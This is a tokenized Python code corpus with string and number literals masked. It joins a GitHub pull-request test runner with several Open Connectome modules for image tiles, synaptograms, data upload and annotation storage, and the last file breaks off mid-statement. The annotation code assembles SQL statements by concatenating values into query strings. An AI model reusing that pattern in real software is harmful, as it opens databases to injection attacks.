unavailable_pythons : <EOL> lines += [ "<STR_LIT>" , <EOL> "<STR_LIT>" + "<STR_LIT:U+002CU+0020>" . join ( self . unavailable_pythons ) ] <EOL> return "<STR_LIT:\n>" . join ( lines ) <EOL> def post_results_comment ( self ) : <EOL> body = self . markdown_format ( ) <EOL> gh_api . post_issue_comment ( gh_project , self . pr_num , body ) <EOL> def print_results ( self ) : <EOL> pr_num = self . pr_num <EOL> branch = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> branch_url = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] + '<STR_LIT>' + branch <EOL> owner = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> mergeable = self . pr [ '<STR_LIT>' ] <EOL> master_sha = self . master_sha <EOL> branch_sha = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ : <NUM_LIT:7> ] <EOL> print ( "<STR_LIT:\n>" ) <EOL> print ( "<STR_LIT>" % pr_num , <EOL> "<STR_LIT>" % ( owner , branch , branch_url ) ) <EOL> if mergeable : <EOL> mrg = "<STR_LIT>" <EOL> else : <EOL> mrg = "<STR_LIT>" <EOL> mrg += "<STR_LIT>" % ( branch_sha , master_sha ) <EOL> print ( mrg ) <EOL> print ( "<STR_LIT>" , sys . platform ) <EOL> for result in self . results : <EOL> if result . passed : <EOL> print ( result . py , "<STR_LIT::>" , "<STR_LIT>" % ( result . skipped , result . num_tests ) ) <EOL> else : <EOL> print ( result . py , "<STR_LIT::>" , "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , result . get ( '<STR_LIT>' ) or result . log_file ) <EOL> if result . missing_libraries : <EOL> print ( "<STR_LIT>" , result . missing_libraries ) <EOL> if self . unavailable_pythons : <EOL> print ( "<STR_LIT>" , <EOL> "<STR_LIT:U+002CU+0020>" . join ( self . unavailable_pythons ) ) <EOL> def dump_results ( self ) : <EOL> with open ( os . path . join ( basedir , '<STR_LIT>' ) , '<STR_LIT:wb>' ) as f : <EOL> pickle . dump ( self , f ) <EOL> @ staticmethod <EOL> def load_results ( ) : <EOL> with open ( os . path . join ( basedir , '<STR_LIT>' ) , '<STR_LIT:rb>' ) as f : <EOL> return pickle . 
load ( f ) <EOL> def save_logs ( self ) : <EOL> for result in self . results : <EOL> if not result . passed : <EOL> result_locn = os . path . abspath ( os . path . join ( '<STR_LIT>' % result . py , <EOL> self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ : <NUM_LIT:7> ] + "<STR_LIT>" ) ) <EOL> with io . open ( result_locn , '<STR_LIT:w>' , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> f . write ( result . log ) <EOL> result . log_file = result_locn <EOL> def post_logs ( self ) : <EOL> for result in self . results : <EOL> if not result . passed : <EOL> result . log_url = gh_api . post_gist ( result . log , <EOL> description = '<STR_LIT>' , <EOL> filename = "<STR_LIT>" , auth = True ) <EOL> def run ( self ) : <EOL> for py , venv in self . venvs : <EOL> tic = time . time ( ) <EOL> passed , log = run_tests ( venv ) <EOL> elapsed = int ( time . time ( ) - tic ) <EOL> print ( "<STR_LIT>" % ( py , elapsed ) ) <EOL> missing_libraries = get_missing_libraries ( log ) <EOL> skipped = get_skipped ( log ) <EOL> num_tests = get_number_tests ( log ) <EOL> self . results . append ( Obj ( py = py , <EOL> passed = passed , <EOL> log = log , <EOL> missing_libraries = missing_libraries , <EOL> skipped = skipped , <EOL> num_tests = num_tests <EOL> ) <EOL> ) <EOL> def run_tests ( venv ) : <EOL> version = venv . split ( '<STR_LIT:->' ) [ <NUM_LIT:1> ] <EOL> py = os . path . join ( basedir , venv , '<STR_LIT>' , '<STR_LIT>' ) <EOL> os . chdir ( repodir ) <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> shutil . rmtree ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" % py ) <EOL> logfile = os . path . join ( basedir , venv , '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" % logfile ) <EOL> with open ( logfile , '<STR_LIT:wb>' ) as f : <EOL> check_call ( [ py , '<STR_LIT>' , '<STR_LIT>' ] , stderr = STDOUT , stdout = f ) <EOL> os . chdir ( basedir ) <EOL> os . environ . 
pop ( "<STR_LIT>" , None ) <EOL> try : <EOL> cmd_file = [ py , '<STR_LIT:-c>' , '<STR_LIT>' ] <EOL> nx_file = check_output ( cmd_file , stderr = STDOUT ) <EOL> except CalledProcessError as e : <EOL> return False , e . output . decode ( '<STR_LIT:utf-8>' ) <EOL> nx_file = nx_file . strip ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> if not nx_file . startswith ( os . path . join ( basedir , venv ) ) : <EOL> msg = u"<STR_LIT>" % nx_file <EOL> msg += u"<STR_LIT>" <EOL> print ( msg , file = sys . stderr ) <EOL> return False , msg <EOL> print ( "<STR_LIT>" % version ) <EOL> cmd = [ py , '<STR_LIT:-c>' , '<STR_LIT>' ] <EOL> try : <EOL> return True , check_output ( cmd , stderr = STDOUT ) . decode ( '<STR_LIT:utf-8>' ) <EOL> except CalledProcessError as e : <EOL> return False , e . output . decode ( '<STR_LIT:utf-8>' ) <EOL> def test_pr ( num , post_results = True ) : <EOL> if post_results : <EOL> gh_api . get_auth_token ( ) <EOL> testrun = TestRun ( num ) <EOL> testrun . get_branch ( ) <EOL> testrun . run ( ) <EOL> testrun . dump_results ( ) <EOL> testrun . save_logs ( ) <EOL> testrun . print_results ( ) <EOL> if post_results : <EOL> results_urls = testrun . post_logs ( ) <EOL> testrun . post_results_comment ( ) <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> post_script = os . path . join ( os . path . dirname ( sys . argv [ <NUM_LIT:0> ] ) , "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , post_script ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import argparse <EOL> parser = argparse . ArgumentParser ( description = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , type = int , help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> import requests <EOL> major , minor , rev = map ( int , requests . __version__ . 
split ( '<STR_LIT:.>' ) ) <EOL> if major == <NUM_LIT:0> and minor < <NUM_LIT:10> : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" . format ( major , minor , rev ) ) <EOL> print ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> test_pr ( args . number , post_results = args . publish ) </s>
<s> import sys <EOL> import tempfile <EOL> import numpy as np <EOL> import zlib <EOL> import cStringIO <EOL> from PIL import Image <EOL> import pylibmc <EOL> import time <EOL> import restargs <EOL> import ocpcadb <EOL> import ocpcaproj <EOL> import ocpcarest <EOL> import django <EOL> import posix_ipc <EOL> import re <EOL> from ocpca_cy import recolor_cy <EOL> import logging <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> class ColorCatmaid : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . db = None <EOL> self . mc = pylibmc . Client ( [ "<STR_LIT:127.0.0.1>" ] , binary = True , behaviors = { "<STR_LIT>" : True , "<STR_LIT>" : True } ) <EOL> def __del__ ( self ) : <EOL> pass <EOL> def loadDB ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . db == None : <EOL> [ self . db , self . proj , self . projdb ] = ocpcarest . loadDBProj ( self . token ) <EOL> def buildKey ( self , res , xtile , ytile , zslice , color , brightness ) : <EOL> return '<STR_LIT>' . format ( self . token , self . tilesz , self . channel , res , xtile , ytile , zslice , color , brightness ) <EOL> def falseColor ( self , tile , color ) : <EOL> """<STR_LIT>""" <EOL> data32 = np . uint32 ( tile ) <EOL> if color == '<STR_LIT:C>' or color == '<STR_LIT>' : <EOL> fcdata = <NUM_LIT> + np . left_shift ( data32 , <NUM_LIT:8> ) + np . left_shift ( data32 , <NUM_LIT:16> ) <EOL> elif color == '<STR_LIT:Y>' or color == '<STR_LIT>' : <EOL> fcdata = <NUM_LIT> + np . left_shift ( data32 , <NUM_LIT:8> ) + data32 <EOL> elif color == '<STR_LIT:M>' or color == '<STR_LIT>' : <EOL> fcdata = <NUM_LIT> + np . left_shift ( data32 , <NUM_LIT:16> ) + data32 <EOL> if color == '<STR_LIT:R>' or color == '<STR_LIT>' : <EOL> fcdata = <NUM_LIT> + data32 <EOL> elif color == '<STR_LIT>' or color == '<STR_LIT>' : <EOL> fcdata = <NUM_LIT> + np . left_shift ( data32 , <NUM_LIT:8> ) <EOL> elif color == '<STR_LIT:B>' or color == '<STR_LIT>' : <EOL> fcdata = <NUM_LIT> + np . 
left_shift ( data32 , <NUM_LIT:16> ) <EOL> return fcdata <EOL> def tile2WebPNG ( self , tile , color , brightness ) : <EOL> """<STR_LIT>""" <EOL> if tile . dtype == np . uint16 : <EOL> tile = np . uint8 ( tile / <NUM_LIT> ) <EOL> if tile . dtype != np . uint8 : <EOL> raise ( "<STR_LIT>" % ( tile . dtype ) ) <EOL> else : <EOL> tile = self . falseColor ( tile , color ) <EOL> img = Image . frombuffer ( '<STR_LIT>' , [ self . tilesz , self . tilesz ] , tile . flatten ( ) , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> if brightness != None : <EOL> from PIL import ImageEnhance <EOL> enhancer = ImageEnhance . Brightness ( img ) <EOL> img = enhancer . enhance ( brightness ) <EOL> return img <EOL> def cacheMiss ( self , res , xtile , ytile , zslice , color , brightness ) : <EOL> """<STR_LIT>""" <EOL> self . loadDB ( ) <EOL> if self . tilesz % self . proj . datasetcfg . cubedim [ res ] [ <NUM_LIT:0> ] != <NUM_LIT:0> or self . tilesz % self . proj . datasetcfg . cubedim [ res ] [ <NUM_LIT:1> ] : <EOL> raise ( "<STR_LIT>" ) <EOL> xstart = xtile * self . tilesz <EOL> ystart = ytile * self . tilesz <EOL> xend = min ( ( xtile + <NUM_LIT:1> ) * self . tilesz , self . proj . datasetcfg . imagesz [ res ] [ <NUM_LIT:0> ] ) <EOL> yend = min ( ( ytile + <NUM_LIT:1> ) * self . tilesz , self . proj . datasetcfg . imagesz [ res ] [ <NUM_LIT:1> ] ) <EOL> imageargs = '<STR_LIT>' . format ( self . channel , res , xstart , xend , ystart , yend , zslice ) <EOL> cb = ocpcarest . xySlice ( imageargs , self . proj , self . db ) <EOL> if cb . data . shape != ( <NUM_LIT:1> , self . tilesz , self . tilesz ) : <EOL> tiledata = np . zeros ( ( self . tilesz , self . tilesz ) , cb . data . dtype ) <EOL> tiledata [ <NUM_LIT:0> : ( ( yend - <NUM_LIT:1> ) % self . tilesz + <NUM_LIT:1> ) , <NUM_LIT:0> : ( ( xend - <NUM_LIT:1> ) % self . tilesz + <NUM_LIT:1> ) ] = cb . data [ <NUM_LIT:0> , : , : ] <EOL> else : <EOL> tiledata = cb . data <EOL> return self . 
tile2WebPNG ( tiledata , color , brightness ) <EOL> def getTile ( self , webargs ) : <EOL> """<STR_LIT>""" <EOL> self . token , tileszstr , self . channel , resstr , xtilestr , ytilestr , zslicestr , color , brightnessstr , rest = webargs . split ( '<STR_LIT:/>' , <NUM_LIT:9> ) <EOL> self . loadDB ( ) <EOL> with closing ( ocpcaproj . OCPCAProjectsDB ( ) ) as projdb : <EOL> self . proj = projdb . loadProject ( self . token ) <EOL> with closing ( ocpcadb . OCPCADB ( self . proj ) ) as self . db : <EOL> xtile = int ( xtilestr ) <EOL> ytile = int ( ytilestr ) <EOL> res = int ( resstr ) <EOL> zslice = int ( zslicestr ) - self . proj . datasetcfg . slicerange [ <NUM_LIT:0> ] <EOL> self . tilesz = int ( tileszstr ) <EOL> brightness = float ( brightnessstr ) <EOL> mckey = self . buildKey ( res , xtile , ytile , zslice , color , brightness ) <EOL> tile = self . mc . get ( mckey ) <EOL> if tile != None : <EOL> fobj = cStringIO . StringIO ( tile ) <EOL> else : <EOL> img = self . cacheMiss ( res , xtile , ytile , zslice , color , brightness ) <EOL> fobj = cStringIO . StringIO ( ) <EOL> img . save ( fobj , "<STR_LIT>" ) <EOL> self . mc . set ( mckey , fobj . getvalue ( ) ) <EOL> fobj . seek ( <NUM_LIT:0> ) <EOL> return fobj </s>
<s> from django . contrib import admin </s>
<s> import django . http <EOL> import numpy as np <EOL> from PIL import Image <EOL> import urllib2 <EOL> import zlib <EOL> import cStringIO <EOL> import re <EOL> import ocpcaproj <EOL> import ocpcarest <EOL> import synaptogram <EOL> """<STR_LIT>""" <EOL> def synaptogram_view ( request , webargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> token , chanstr , centroidstr , rest = webargs . split ( '<STR_LIT:/>' , <NUM_LIT:3> ) <EOL> channels = chanstr . split ( '<STR_LIT:U+002C>' ) <EOL> centroid = map ( lambda x : int ( x ) , centroidstr . split ( '<STR_LIT:U+002C>' ) ) <EOL> sog = synaptogram . Synaptogram ( token , channels , centroid ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setReference ( s . group ( <NUM_LIT:1> ) . split ( '<STR_LIT:U+002C>' ) ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setEM ( s . group ( <NUM_LIT:1> ) . split ( '<STR_LIT:U+002C>' ) ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setEnhance ( float ( s . group ( <NUM_LIT:1> ) ) ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setNormalize ( ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setNormalize2 ( ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setResolution ( int ( s . group ( <NUM_LIT:1> ) ) ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setWidth ( int ( s . group ( <NUM_LIT:1> ) ) ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setTileWidth ( int ( s . group ( <NUM_LIT:1> ) ) ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setFrameWidth ( int ( s . group ( <NUM_LIT:1> ) ) ) <EOL> sogimg = sog . construct ( ) <EOL> fobj = cStringIO . StringIO ( ) <EOL> sogimg . save ( fobj , "<STR_LIT>" ) <EOL> fobj . seek ( <NUM_LIT:0> ) <EOL> return django . http . HttpResponse ( fobj . 
read ( ) , mimetype = "<STR_LIT>" ) <EOL> except Exception , e : <EOL> raise </s>
<s> import argparse <EOL> import numpy as np <EOL> import urllib , urllib2 <EOL> import cStringIO <EOL> import sys <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT:filename>' , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" , type = int , default = <NUM_LIT:0> ) <EOL> result = parser . parse_args ( ) <EOL> url = '<STR_LIT>' % ( result . baseurl , result . token , result . channel , result . resolution ) <EOL> print url <EOL> fh = open ( result . filename ) <EOL> try : <EOL> f = urllib2 . urlopen ( url , fh . read ( ) ) <EOL> except urllib2 . URLError , e : <EOL> print "<STR_LIT>" % ( url , e ) <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import argparse <EOL> import numpy as np <EOL> from PIL import Image <EOL> import ocppaths <EOL> import ocpcarest <EOL> import zindex <EOL> import anydbm <EOL> import multiprocessing <EOL> import pdb <EOL> """<STR_LIT>""" <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT:path>' , action = "<STR_LIT:store>" , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" , help = '<STR_LIT>' ) <EOL> result = parser . parse_args ( ) <EOL> resolution = <NUM_LIT:0> <EOL> [ db , proj , projdb ] = ocpcarest . loadDBProj ( result . token ) <EOL> ( xcubedim , ycubedim , zcubedim ) = proj . datasetcfg . cubedim [ resolution ] <EOL> ( startslice , endslice ) = proj . datasetcfg . slicerange <EOL> batchsz = zcubedim <EOL> ximagesz = <NUM_LIT> <EOL> yimagesz = <NUM_LIT> <EOL> batchsz = <NUM_LIT:16> <EOL> totalslices = range ( startslice , endslice , <NUM_LIT:16> ) <EOL> totalprocs = int ( result . process ) <EOL> def parallelwrite ( slicenumber ) : <EOL> [ db , proj , projdb ] = ocpcarest . loadDBProj ( result . token ) <EOL> startslice = slicenumber <EOL> endslice = startslice + <NUM_LIT:16> <EOL> for sl in range ( startslice , endslice + <NUM_LIT:1> , batchsz ) : <EOL> slab = np . zeros ( [ batchsz , yimagesz , ximagesz ] , dtype = np . uint32 ) <EOL> for b in range ( batchsz ) : <EOL> if ( sl + b <= endslice and sl + b <= <NUM_LIT> ) : <EOL> filenm = result . path + '<STR_LIT>' + '<STR_LIT>' . format ( sl + b ) + '<STR_LIT>' <EOL> img = Image . open ( filenm , '<STR_LIT:r>' ) <EOL> imgdata = np . asarray ( img ) <EOL> anydb = anydbm . open ( '<STR_LIT>' , '<STR_LIT:r>' ) <EOL> superpixelarray = imgdata [ : , : , <NUM_LIT:0> ] + ( np . 
uint32 ( imgdata [ : , : , <NUM_LIT:1> ] ) << <NUM_LIT:8> ) <EOL> newdata = np . zeros ( [ superpixelarray . shape [ <NUM_LIT:0> ] , superpixelarray . shape [ <NUM_LIT:1> ] ] , dtype = np . uint32 ) <EOL> print sl + b , multiprocessing . current_process ( ) <EOL> for i in range ( superpixelarray . shape [ <NUM_LIT:0> ] ) : <EOL> for j in range ( superpixelarray . shape [ <NUM_LIT:1> ] ) : <EOL> key = str ( sl ) + '<STR_LIT:U+002C>' + str ( superpixelarray [ i , j ] ) <EOL> if ( key not in anydb ) : <EOL> f = open ( '<STR_LIT>' , '<STR_LIT:a>' ) <EOL> f . write ( key + '<STR_LIT:\n>' ) <EOL> f . close ( ) <EOL> print "<STR_LIT>" <EOL> dictvalue = '<STR_LIT:0>' <EOL> else : <EOL> dictvalue = anydb . get ( key ) <EOL> newdata [ i , j ] = int ( dictvalue ) <EOL> slab [ b , : , : ] = newdata <EOL> print "<STR_LIT>" , sl + b <EOL> anydb . close ( ) <EOL> print "<STR_LIT>" <EOL> for y in range ( <NUM_LIT:0> , yimagesz , ycubedim ) : <EOL> for x in range ( <NUM_LIT:0> , ximagesz , xcubedim ) : <EOL> mortonidx = zindex . XYZMorton ( [ x / xcubedim , y / ycubedim , ( sl - startslice ) / zcubedim ] ) <EOL> cubedata = np . zeros ( [ zcubedim , ycubedim , xcubedim ] , dtype = np . uint32 ) <EOL> xmin = x <EOL> ymin = y <EOL> xmax = min ( ximagesz , x + xcubedim ) <EOL> ymax = min ( yimagesz , y + ycubedim ) <EOL> zmin = <NUM_LIT:0> <EOL> zmax = min ( sl + zcubedim , endslice + <NUM_LIT:1> ) <EOL> cubedata [ <NUM_LIT:0> : zmax - zmin , <NUM_LIT:0> : ymax - ymin , <NUM_LIT:0> : xmax - xmin ] = slab [ zmin : zmax , ymin : ymax , xmin : xmax ] <EOL> db . annotateDense ( ( x , y , sl - startslice ) , resolution , cubedata , '<STR_LIT:O>' ) <EOL> print "<STR_LIT>" % ( x , y , sl ) <EOL> db . conn . commit ( ) <EOL> return None <EOL> def run ( ) : <EOL> flypool = multiprocessing . Pool ( totalprocs ) <EOL> flypool . map ( parallelwrite , totalslices , <NUM_LIT:16> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run ( ) </s>
<s> import argparse <EOL> import cStringIO <EOL> import urllib2 <EOL> import sys <EOL> import zlib <EOL> import zindex <EOL> import MySQLdb <EOL> from PIL import Image <EOL> import empaths <EOL> import emcaproj <EOL> import emcadb <EOL> import dbconfig <EOL> import imagecube <EOL> import numpy as np <EOL> RESOLUTION = <NUM_LIT:0> <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT>' , type = int , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT:path>' , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT>' , type = int , action = "<STR_LIT:store>" ) <EOL> result = parser . parse_args ( ) <EOL> projdb = emcaproj . EMCAProjectsDB ( ) <EOL> proj = projdb . getProj ( result . token ) <EOL> dbcfg = dbconfig . switchDataset ( proj . getDataset ( ) ) <EOL> _ximgsz = None <EOL> _yimgsz = None <EOL> for sl in range ( result . numslices ) : <EOL> filenm = result . path + '<STR_LIT:/>' + '<STR_LIT>' . format ( sl ) + '<STR_LIT>' <EOL> print filenm <EOL> img = Image . open ( filenm , "<STR_LIT:r>" ) <EOL> if _ximgsz == None and _yimgsz == None : <EOL> _ximgsz , _yimgsz = img . size <EOL> imarray = np . zeros ( [ result . numslices , _yimgsz , _ximgsz ] , dtype = np . uint16 ) <EOL> else : <EOL> assert _ximgsz == img . size [ <NUM_LIT:0> ] and _yimgsz == img . size [ <NUM_LIT:1> ] <EOL> imarray [ sl , : , : ] = np . asarray ( img ) <EOL> xcubedim , ycubedim , zcubedim = dbcfg . cubedim [ <NUM_LIT:0> ] <EOL> xlimit = ( _ximgsz - <NUM_LIT:1> ) / xcubedim + <NUM_LIT:1> <EOL> ylimit = ( _yimgsz - <NUM_LIT:1> ) / ycubedim + <NUM_LIT:1> <EOL> zlimit = ( result . numslices - <NUM_LIT:1> ) / zcubedim + <NUM_LIT:1> <EOL> db = emcadb . EMCADB ( dbcfg , proj ) <EOL> cursor = db . conn . cursor ( ) <EOL> for z in range ( zlimit ) : <EOL> db . 
commit ( ) <EOL> for y in range ( ylimit ) : <EOL> for x in range ( xlimit ) : <EOL> zmin = z * zcubedim <EOL> zmax = min ( ( z + <NUM_LIT:1> ) * zcubedim , result . numslices ) <EOL> zmaxrel = ( ( zmax - <NUM_LIT:1> ) % zcubedim ) + <NUM_LIT:1> <EOL> ymin = y * ycubedim <EOL> ymax = min ( ( y + <NUM_LIT:1> ) * ycubedim , _yimgsz ) <EOL> ymaxrel = ( ( ymax - <NUM_LIT:1> ) % ycubedim ) + <NUM_LIT:1> <EOL> xmin = x * xcubedim <EOL> xmax = min ( ( x + <NUM_LIT:1> ) * xcubedim , _ximgsz ) <EOL> xmaxrel = ( ( xmax - <NUM_LIT:1> ) % xcubedim ) + <NUM_LIT:1> <EOL> key = zindex . XYZMorton ( [ x , y , z ] ) <EOL> cube = imagecube . ImageCube16 ( [ xcubedim , ycubedim , zcubedim ] ) <EOL> cube . data [ <NUM_LIT:0> : zmaxrel , <NUM_LIT:0> : ymaxrel , <NUM_LIT:0> : xmaxrel ] = imarray [ zmin : zmax , ymin : ymax , xmin : xmax ] <EOL> npz = cube . toNPZ ( ) <EOL> sql = "<STR_LIT>" + proj . getTable ( RESOLUTION ) + "<STR_LIT>" <EOL> print sql <EOL> try : <EOL> cursor . execute ( sql , ( result . channel , key , npz ) ) <EOL> except MySQLdb . Error , e : <EOL> raise ANNError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> db . conn . commit ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import numpy as np <EOL> import cStringIO <EOL> import MySQLdb <EOL> import sys <EOL> from collections import defaultdict <EOL> from ocpcaerror import OCPCAError <EOL> import logging <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> """<STR_LIT>""" <EOL> ANNO_ANNOTATION = <NUM_LIT:1> <EOL> ANNO_SYNAPSE = <NUM_LIT:2> <EOL> ANNO_SEED = <NUM_LIT:3> <EOL> ANNO_SEGMENT = <NUM_LIT:4> <EOL> ANNO_NEURON = <NUM_LIT:5> <EOL> ANNO_ORGANELLE = <NUM_LIT:6> <EOL> anno_dbtables = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> class BatchAnnotation : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , annodb ) : <EOL> """<STR_LIT>""" <EOL> self . annodb = annodb <EOL> self . annidList = [ ] <EOL> self . statusList = [ <NUM_LIT:0> ] <EOL> self . confidenceList = [ <NUM_LIT:0.0> ] <EOL> self . authorList = [ "<STR_LIT>" ] <EOL> self . kvpairs = defaultdict ( list ) <EOL> def setID ( self , db ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . annidList ) == <NUM_LIT:0> : <EOL> self . annidList . append ( db . nextID ( ) ) <EOL> else : <EOL> db . setBatchID ( self . annidList ) <EOL> def getField ( self , field ) : <EOL> """<STR_LIT>""" <EOL> if field == '<STR_LIT:status>' : <EOL> return self . statusList <EOL> elif field == '<STR_LIT>' : <EOL> return self . confidenceList <EOL> elif field == '<STR_LIT>' : <EOL> return self . authorList <EOL> elif self . kvpairs . get ( field ) : <EOL> return self . kvpairs [ field ] <EOL> else : <EOL> logger . warning ( "<STR_LIT>" % ( field ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( field ) ) <EOL> def setField ( self , field , value ) : <EOL> """<STR_LIT>""" <EOL> if field == '<STR_LIT:status>' : <EOL> self . statusList . append ( value ) <EOL> elif field == '<STR_LIT>' : <EOL> self . confidenceList . append ( value ) <EOL> elif field == '<STR_LIT>' : <EOL> self . 
authorList = ( value ) <EOL> else : <EOL> self . kvpairs [ field ] = value <EOL> def store ( self , cursor , annotype = ANNO_ANNOTATION ) : <EOL> """<STR_LIT>""" <EOL> sql = "<STR_LIT>" . format ( anno_dbtables [ '<STR_LIT>' ] ) <EOL> data = zip ( self . annidList , len ( self . annidList ) * [ annotype ] , self . confidenceList , self . statusList ) <EOL> try : <EOL> cursor . executemany ( sql , data ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> if self . author != "<STR_LIT>" : <EOL> self . kvpairs [ '<STR_LIT>' ] = self . author <EOL> if len ( self . kvpairs ) != <NUM_LIT:0> : <EOL> try : <EOL> kvclause = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT:(>' + str ( self . annid ) + '<STR_LIT>' + k + '<STR_LIT>' + v + '<STR_LIT>' for ( k , v ) in self . kvpairs . iteritems ( ) ] ) <EOL> except : <EOL> raise OCPCAError ( "<STR_LIT>" + kvclause ) <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , kvclause ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> def update ( self , cursor ) : <EOL> """<STR_LIT>""" <EOL> self . updateBase ( ANNO_ANNOTATION , cursor ) <EOL> def updateBase ( self , annotype , cursor ) : <EOL> """<STR_LIT>""" <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , annotype , self . confidence , self . status , self . annid ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . 
